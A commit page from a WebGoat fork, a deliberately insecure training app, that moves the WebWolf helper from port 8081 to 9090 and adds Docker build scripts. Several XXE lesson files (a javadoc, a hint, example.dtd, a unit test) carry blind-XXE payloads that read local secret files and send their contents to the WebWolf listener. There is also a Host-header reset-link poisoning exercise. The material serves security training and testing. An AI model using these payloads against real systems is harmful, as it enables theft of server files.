dubey/WebGoat
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update to new version for develop

Browse Source 
Move WebWolf to port 9090 easier since most of the time something is running on 8081
Add scripts for easy building Docker files etc
This commit is contained in:
Nanne Baars 2018-05-30 13:17:05 +02:00
parent 0de784eb32
commit ecb7688e08
46 changed files with 131 additions and 67 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
docker-compose-postgres.yml
View File

@ -6,6 +6,7 @@ services:
user: webgoat user: webgoat
environment: environment:
- WEBWOLF_HOST=webwolf - WEBWOLF_HOST=webwolf
- WEBWOLF_PORT=9090
- spring.datasource.url=jdbc:postgresql://webgoat_db:5432/webgoat - spring.datasource.url=jdbc:postgresql://webgoat_db:5432/webgoat
- spring.datasource.username=webgoat - spring.datasource.username=webgoat
- spring.datasource.password=webgoat - spring.datasource.password=webgoat
@ -22,7 +23,7 @@ services:
- spring.datasource.driver-class-name=org.postgresql.Driver - spring.datasource.driver-class-name=org.postgresql.Driver
- spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect - spring.jpa.properties.hibernate.dialect=org.hibernate.dialect.PostgreSQL94Dialect
ports: ports:
- "8081:8081" - "9090:9090"
db: db:
container_name: webgoat_db container_name: webgoat_db
image: postgres:latest image: postgres:latest

3
docker-compose.yml
View File

@ -5,6 +5,7 @@ services:
image: webgoat/webgoat-8.0 image: webgoat/webgoat-8.0
environment: environment:
- WEBWOLF_HOST=webwolf - WEBWOLF_HOST=webwolf
- WEBWOLF_PORT=9090
- spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat
ports: ports:
- "8080:8080" - "8080:8080"
@ -15,7 +16,7 @@ services:
environment: environment:
- spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat - spring.datasource.url=jdbc:hsqldb:hsql://webgoat_db:9001/webgoat
ports: ports:
- "8081:8081" - "9090:9090"
depends_on: depends_on:
- db - db
db: db:

27
pom.xml
View File

@ -1,11 +1,12 @@
<?xml version="1.0"?> <?xml version="1.0"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"> <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
<modelVersion>4.0.0</modelVersion> <modelVersion>4.0.0</modelVersion>
<groupId>org.owasp.webgoat</groupId> <groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId> <artifactId>webgoat-parent</artifactId>
<packaging>pom</packaging> <packaging>pom</packaging>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
<name>WebGoat Parent Pom</name> <name>WebGoat Parent Pom</name>
<description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description> <description>Parent Pom for the WebGoat Project. A deliberately insecure Web Application</description>
@ -53,17 +54,17 @@
<developer> <developer>
<id>jwayman</id> <id>jwayman</id>
<name>Jeff Wayman</name> <name>Jeff Wayman</name>
<email /> <email/>
</developer> </developer>
<developer> <developer>
<id>dcowden</id> <id>dcowden</id>
<name>Dave Cowden</name> <name>Dave Cowden</name>
<email /> <email/>
</developer> </developer>
<developer> <developer>
<id>lawson89</id> <id>lawson89</id>
<name>Richard Lawson</name> <name>Richard Lawson</name>
<email /> <email/>
</developer> </developer>
<developer> <developer>
<id>dougmorato</id> <id>dougmorato</id>
@ -92,8 +93,8 @@
<url>https://github.com/WebGoat/WebGoat</url> <url>https://github.com/WebGoat/WebGoat</url>
<connection>scm:git:git@github.com:WebGoat/WebGoat.git</connection> <connection>scm:git:git@github.com:WebGoat/WebGoat.git</connection>
<developerConnection>scm:git:git@github.com:WebGoat/WebGoat.git</developerConnection> <developerConnection>scm:git:git@github.com:WebGoat/WebGoat.git</developerConnection>
<tag>HEAD</tag> <tag>HEAD</tag>
</scm> </scm>
<issueManagement> <issueManagement>
<system>Github Issues</system> <system>Github Issues</system>
@ -202,7 +203,7 @@
<profiles> <profiles>
<profile> <profile>
<id>release</id> <id>release</id>
<dependencies> <dependencies>
<dependency> <dependency>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>dist</artifactId> <artifactId>dist</artifactId>
@ -214,7 +215,7 @@
</dependencies> </dependencies>
<build> <build>
<plugins> <plugins>
<plugin> <plugin>
<groupId>org.apache.maven.plugins</groupId> <groupId>org.apache.maven.plugins</groupId>
<artifactId>maven-dependency-plugin</artifactId> <artifactId>maven-dependency-plugin</artifactId>
<executions> <executions>
@ -225,7 +226,9 @@
</goals> </goals>
<phase>generate-resources</phase> <phase>generate-resources</phase>
<configuration> <configuration>
<outputDirectory>${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons</outputDirectory> <outputDirectory>
${project.basedir}/webgoat-container/src/main/webapp/plugin_lessons
</outputDirectory>
<includeArtifactIds>dist</includeArtifactIds> <includeArtifactIds>dist</includeArtifactIds>
<includes>*.jar</includes> <includes>*.jar</includes>
</configuration> </configuration>
@ -324,7 +327,7 @@
<artifactId>coveralls-maven-plugin</artifactId> <artifactId>coveralls-maven-plugin</artifactId>
<version>${coveralls-maven-plugin.version}</version> <version>${coveralls-maven-plugin.version}</version>
<configuration> <configuration>
<repoToken /> <repoToken/>
</configuration> </configuration>
</plugin> </plugin>
<plugin> <plugin>
@ -332,7 +335,7 @@
<artifactId>cobertura-maven-plugin</artifactId> <artifactId>cobertura-maven-plugin</artifactId>
<version>${cobertura-maven-plugin.version}</version> <version>${cobertura-maven-plugin.version}</version>
<configuration> <configuration>
<check /> <check/>
<format>xml</format> <format>xml</format>
<maxmem>256m</maxmem> <maxmem>256m</maxmem>
<!-- aggregated reports for multi-module projects --> <!-- aggregated reports for multi-module projects -->

32
scripts/build-all.sh Normal file
View File

@ -0,0 +1,32 @@
#!/usr/bin/env bash
cd ..
nc -zv 127.0.0.1 8080 2>/dev/null
SUCCESS=$?
nc -zv 127.0.0.1 9090 2>/dev/null
SUCCESS=${SUCCESS}$?
if [[ "${SUCCESS}" -eq 00 ]] ; then
echo "WebGoat and or WebWolf are still running, please stop them first otherwise unit tests might fail!"
exit 127
fi
#mvn clean install
#if [[ "$?" -ne 0 ]] ; then
# exit y$?
#fi
cd -
sh build_docker.sh
echo "Do you want to run docker-compose?"
while true; do
read -p "Do you want to run docker-compose?" yn
case ${yn} in
[Yy]* ) sh clean-run-docker-compose.sh; break;;
[Nn]* ) exit;;
* ) echo "Please answer yes or no.";;
esac
done

10
scripts/build_docker.sh Normal file
View File

@ -0,0 +1,10 @@
#!/bin/bash
WEBGOAT_HOME=$(pwd)/../
cd ${WEBGOAT_HOME}/webgoat-server
docker build -t webgoat/webgoat-8.0 .
cd ${WEBGOAT_HOME}/webwolf
docker build -t webgoat/webwolf .

5
scripts/clean-run-docker-compose.sh Normal file
View File

@ -0,0 +1,5 @@
#!/usr/bin/env bash
cd ..
docker-compose rm -f
docker-compose up

4
scripts/run-docker-compose.sh Normal file
View File

@ -0,0 +1,4 @@
#!/usr/bin/env bash
cd ..
docker-compose up

2
webgoat-container/pom.xml
View File

@ -10,7 +10,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat</groupId> <groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId> <artifactId>webgoat-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<profiles> <profiles>

2
webgoat-container/src/main/resources/application.properties
View File

@ -37,7 +37,7 @@ webgoat.database.connection.string=jdbc:hsqldb:mem:{USER}
webgoat.default.language=en webgoat.default.language=en
webwolf.host=${WEBWOLF_HOST:localhost} webwolf.host=${WEBWOLF_HOST:localhost}
webwolf.port=${WEBWOLF_PORT:8081} webwolf.port=${WEBWOLF_PORT:9090}
webwolf.url=http://${webwolf.host}:${webwolf.port}/WebWolf webwolf.url=http://${webwolf.host}:${webwolf.port}/WebWolf
webwolf.url.landingpage=http://${webwolf.host}:${webwolf.port}/landing webwolf.url.landingpage=http://${webwolf.host}:${webwolf.port}/landing
webwolf.url.mail=http://${webwolf.host}:${webwolf.port}/mail webwolf.url.mail=http://${webwolf.host}:${webwolf.port}/mail

2
webgoat-images/vagrant-training/Vagrantfile vendored
View File

@ -3,7 +3,7 @@
Vagrant.configure(2) do |config| Vagrant.configure(2) do |config|
config.vm.box = "ubuntu/trusty64" config.vm.box = "ubuntu/trusty64"
config.vm.network :forwarded_port, guest: 8080, host: 8080 config.vm.network :forwarded_port, guest: 8080, host: 8080
config.vm.network :forwarded_port, guest: 8081, host: 8081 config.vm.network :forwarded_port, guest: 9090, host: 9090
config.vm.provider "virtualbox" do |vb| config.vm.provider "virtualbox" do |vb|
vb.gui = false vb.gui = false
vb.memory = "4096" vb.memory = "4096"

2
webgoat-lessons/auth-bypass/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/bypass-restrictions/pom.xml
View File

@ -6,6 +6,6 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/challenge/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>

2
webgoat-lessons/client-side-filtering/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/cross-site-scripting/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<build> <build>
<plugins> <plugins>

2
webgoat-lessons/csrf/pom.xml
View File

@ -6,6 +6,6 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/html-tampering/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

2
webgoat-lessons/http-basics/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/http-proxies/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

2
webgoat-lessons/idor/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/insecure-deserialization/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

2
webgoat-lessons/insecure-login/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

2
webgoat-lessons/jwt/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

2
webgoat-lessons/missing-function-ac/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/password-reset/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

2
webgoat-lessons/password-reset/src/main/java/org/owasp/webgoat/plugin/ResetLinkAssignment.java
View File

@ -62,7 +62,7 @@ public class ResetLinkAssignment extends AssignmentEndpoint {
resetLinks.add(resetLink); resetLinks.add(resetLink);
String host = request.getHeader("host"); String host = request.getHeader("host");
if (org.springframework.util.StringUtils.hasText(email)) { if (org.springframework.util.StringUtils.hasText(email)) {
if (email.equals(TOM_EMAIL) && host.contains("8081")) { //User indeed changed the host header. if (email.equals(TOM_EMAIL) && host.contains("9090")) { //User indeed changed the host header.
userToTomResetLink.put(getWebSession().getUserName(), resetLink); userToTomResetLink.put(getWebSession().getUserName(), resetLink);
fakeClickingLinkEmail(host, resetLink); fakeClickingLinkEmail(host, resetLink);
} else { } else {

2
webgoat-lessons/password-reset/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -15,7 +15,7 @@ password-reset-not-solved=Sorry but you did not redirect the reset link to WebWo
password-reset-hint1=Try to send a password reset link to your own account at {user}@webgoat.org, you can read this e-mail in WebWolf. password-reset-hint1=Try to send a password reset link to your own account at {user}@webgoat.org, you can read this e-mail in WebWolf.
password-reset-hint2=Look at the link, can you think how the server creates this link? password-reset-hint2=Look at the link, can you think how the server creates this link?
password-reset-hint3=Tom clicks all the links he receives in his mailbox, you can use the landing page in WebWolf to get the reset link... password-reset-hint3=Tom clicks all the links he receives in his mailbox, you can use the landing page in WebWolf to get the reset link...
password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:8081 password-reset-hint4=The link points to localhost:8080/PasswordReset/.... can you change the host to localhost:9090
password-reset-hint5=Intercept the request and change the host header password-reset-hint5=Intercept the request and change the host header
login_failed=Login failed login_failed=Login failed
login_failed.tom=Sorry only Tom can login at the moment login_failed.tom=Sorry only Tom can login at the moment

4
webgoat-lessons/pom.xml
View File

@ -5,12 +5,12 @@
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<packaging>pom</packaging> <packaging>pom</packaging>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
<parent> <parent>
<groupId>org.owasp.webgoat</groupId> <groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId> <artifactId>webgoat-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<modules> <modules>

2
webgoat-lessons/sql-injection/pom.xml
View File

@ -6,6 +6,6 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/vulnerable-components/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>
<dependency> <dependency>

2
webgoat-lessons/webgoat-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

2
webgoat-lessons/webwolf-introduction/pom.xml
View File

@ -6,6 +6,6 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
</project> </project>

9
webgoat-lessons/webwolf-introduction/src/main/resources/lessonPlans/en/IntroductionWebWolf.adoc
View File

@ -27,21 +27,24 @@ WebWolf runs as a separate web application and is started automatically when usi
are not using the Docker image you will need to download the jar file and start it: are not using the Docker image you will need to download the jar file and start it:
``` ```
java -jar webwolf-<<version>>.jar java -jar webwolf-<<version>>.jar [--server.port=9090] [--server.address=localhost]
``` ```
By default WebWolf starts on port 9090 with `--server.port` you can specify a different port. With `server.address` you
can bind it to a different address (default localhost)
WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need WebWolf is also available as a Docker container, because it shares the database with WebGoat we first need
to find out the ip address of the Docker container. to find out the ip address of the Docker container.
``` ```
WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`) WEBGOAT_SERVER_ADDRESS=$(docker inspect -f "{{ .NetworkSettings.IPAddress }}" `docker ps | grep webgoat | awk '{print $1}'`)
docker pull webgoat/webwolf docker pull webgoat/webwolf
docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 8081:8081 webgoat/webwolf /home/webwolf/run.sh docker run -e webgoat.server.address=${WEBGOAT_SERVER_ADDRESS} -it -p 9090:9090 webgoat/webwolf /home/webwolf/run.sh
``` ```
Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If Note: if you start WebGoat as standalone application you need to start WebWolf as standalone application as well. If
you start WebGoat as Docker container you need to start WebWolf as Docker container as well. you start WebGoat as Docker container you need to start WebWolf as Docker container as well.
This will start the application on port 8081, click webWolfLink:here[] to open WebWolf. This will start the application on port 9090, click webWolfLink:here[] to open WebWolf.
First thing you need to do is register a new user within WebWolf. First thing you need to do is register a new user within WebWolf.

2
webgoat-lessons/xxe/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat.lesson</groupId> <groupId>org.owasp.webgoat.lesson</groupId>
<artifactId>webgoat-lessons-parent</artifactId> <artifactId>webgoat-lessons-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

8
webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/BlindSendFileAssignment.java
View File

@ -89,7 +89,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
/** /**
<?xml version="1.0"?> <?xml version="1.0"?>
<!DOCTYPE comment [ <!DOCTYPE comment [
<!ENTITY % remote SYSTEM "http://localhost:8081/files/admin2/attack.dtd"> <!ENTITY % remote SYSTEM "http://localhost:9090/files/admin2/attack.dtd">
%remote; %remote;
]> ]>
<comment> <text>test&send;</text></comment> <comment> <text>test&send;</text></comment>
@ -102,14 +102,14 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
* <pre> * <pre>
* <?xml version="1.0" encoding="UTF-8"?> * <?xml version="1.0" encoding="UTF-8"?>
* <!ENTITY % file SYSTEM "file:///c:/windows-version.txt"> * <!ENTITY % file SYSTEM "file:///c:/windows-version.txt">
* <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8081/ping?text=%file;'>"> * <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:9090/ping?text=%file;'>">
* %all; * %all;
* </pre> * </pre>
* *
* This will be reduced to: * This will be reduced to:
* *
* <pre> * <pre>
* <!ENTITY send SYSTEM 'http://localhost:8081/ping?text=[contents_file]'> * <!ENTITY send SYSTEM 'http://localhost:9090/ping?text=[contents_file]'>
* </pre> * </pre>
* *
* Wire it all up in the xml send to the server: * Wire it all up in the xml send to the server:
@ -117,7 +117,7 @@ public class BlindSendFileAssignment extends AssignmentEndpoint {
* <pre> * <pre>
* <?xml version="1.0"?> * <?xml version="1.0"?>
* <!DOCTYPE root [ * <!DOCTYPE root [
* <!ENTITY % remote SYSTEM "http://localhost:8081/WebWolf/files/test.dtd"> * <!ENTITY % remote SYSTEM "http://localhost:9090/WebWolf/files/test.dtd">
* %remote; * %remote;
* ]> * ]>
* <user> * <user>

2
webgoat-lessons/xxe/src/main/resources/i18n/WebGoatLabels.properties
View File

@ -43,4 +43,4 @@ xxe.blind.hints.1=This assignment is more complicated you need to upload the con
xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities. xxe.blind.hints.2=In this case you cannot combine external entities in combination with internal entities.
xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/ xxe.blind.hints.3=Use parameter entities to perform the attack, see for example: https://www.acunetix.com/blog/articles/xml-external-entity-xxe-limitations/
xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment xxe.blind.hints.4=An example DTD can be found here WebGoat/images/example.dtd, include this DTD in the xml comment
xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: &lt;?xml version="1.0"?&gt;&lt;!DOCTYPE comment [&lt;!ENTITY % remote SYSTEM "http://localhost:8081/files/test1234/test.dtd"&gt;%remote;]&gt;&lt;comment&gt;&lt;text&gt;test&send;&lt;/text&gt;&lt;/comment&gt; xxe.blind.hints.5=Use for the comment, be aware to replace the url accordingly: &lt;?xml version="1.0"?&gt;&lt;!DOCTYPE comment [&lt;!ENTITY % remote SYSTEM "http://localhost:9090/files/test1234/test.dtd"&gt;%remote;]&gt;&lt;comment&gt;&lt;text&gt;test&send;&lt;/text&gt;&lt;/comment&gt;

5
webgoat-lessons/xxe/src/main/resources/images/example.dtd
View File

@ -1,5 +1,4 @@
<?xml version="1.0" encoding="UTF-8"?> <?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % file SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt"> <!ENTITY % file SYSTEM "file:/home/nbaars/.webgoat-v8.0.0.M14/XXE/secret.txt">
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>"> <!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>">
%all; %all;
~

6
webgoat-lessons/xxe/src/test/java/org/owasp/webgoat/plugin/BlindSendFileAssignmentTest.java
View File

@ -37,7 +37,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
private String webGoatHomeDirectory; private String webGoatHomeDirectory;
@Rule @Rule
public WireMockRule webwolfServer = new WireMockRule(8081); public WireMockRule webwolfServer = new WireMockRule(9090);
@Before @Before
public void setup() throws Exception { public void setup() throws Exception {
@ -74,7 +74,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
//Host DTD on WebWolf site //Host DTD on WebWolf site
String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" + String dtd = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n" +
"<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" + "<!ENTITY % file SYSTEM \"" + targetFile.toURI().toString() + "\">\n" +
"<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:8081/landing?text=%file;'>\">\n" + "<!ENTITY % all \"<!ENTITY send SYSTEM 'http://localhost:9090/landing?text=%file;'>\">\n" +
"%all;"; "%all;";
webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd")) webwolfServer.stubFor(get(WireMock.urlMatching("/files/test.dtd"))
.willReturn(aResponse() .willReturn(aResponse()
@ -85,7 +85,7 @@ public class BlindSendFileAssignmentTest extends LessonTest {
//Make the request from WebGoat //Make the request from WebGoat
String xml = "<?xml version=\"1.0\"?>" + String xml = "<?xml version=\"1.0\"?>" +
"<!DOCTYPE comment [" + "<!DOCTYPE comment [" +
"<!ENTITY % remote SYSTEM \"http://localhost:8081/files/test.dtd\">" + "<!ENTITY % remote SYSTEM \"http://localhost:9090/files/test.dtd\">" +
"%remote;" + "%remote;" +
"]>" + "]>" +
"<comment><text>test&send;</text></comment>"; "<comment><text>test&send;</text></comment>";

2
webgoat-server/Dockerfile
View File

@ -1,6 +1,6 @@
FROM openjdk:8-jre-slim FROM openjdk:8-jre-slim
ARG webgoat_version=8.0-SNAPSHOT ARG webgoat_version=v8.0.0.SNAPSHOT
RUN \ RUN \
apt-get update && apt-get install && \ apt-get update && apt-get install && \

2
webgoat-server/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat</groupId> <groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId> <artifactId>webgoat-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<properties> <properties>

6
webwolf/Dockerfile
View File

@ -1,6 +1,6 @@
FROM openjdk:8-jre-slim FROM openjdk:8-jre-slim
ARG webwolf_version=8.0-SNAPSHOT ARG webwolf_version=v8.0.0.SNAPSHOT
RUN \ RUN \
apt-get update && apt-get install && \ apt-get update && apt-get install && \
@ -9,6 +9,6 @@ RUN \
USER webwolf USER webwolf
COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar COPY target/webwolf-${webwolf_version}.jar /home/webwolf/webwolf.jar
ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.address=0.0.0.0"] ENTRYPOINT ["java", "-Djava.security.egd=file:/dev/./urandom", "-jar", "/home/webwolf/webwolf.jar", "--server.port=9090", "--server.address=0.0.0.0"]
EXPOSE 8081 EXPOSE 9090

4
webwolf/README.md
View File

@ -21,7 +21,7 @@ At the moment WebWolf offers support for:
## 1. Run using Docker ## 1. Run using Docker
If you use the Docker image of WebGoat this application will automatically be available. Use the following If you use the Docker image of WebGoat this application will automatically be available. Use the following
URL: http://localhost:8081/WebWolf URL: http://localhost:9090/WebWolf
## 2. Standalone ## 2. Standalone
@ -36,7 +36,7 @@ Now we are ready to run the project. WebGoat 8.x is using Spring-Boot.
```Shell ```Shell
mvn -pl webwolf spring-boot:run mvn -pl webwolf spring-boot:run
``` ```
... you should be running WebWolf on localhost:8081/WebWolf momentarily ... you should be running WebWolf on localhost:9090/WebWolf momentarily

2
webwolf/pom.xml
View File

@ -6,7 +6,7 @@
<parent> <parent>
<groupId>org.owasp.webgoat</groupId> <groupId>org.owasp.webgoat</groupId>
<artifactId>webgoat-parent</artifactId> <artifactId>webgoat-parent</artifactId>
<version>v8.0.0.M15</version> <version>v8.0.0.SNAPSHOT</version>
</parent> </parent>
<dependencies> <dependencies>

6
webwolf/src/main/java/org/owasp/webwolf/FileServer.java
View File

@ -32,6 +32,11 @@ public class FileServer {
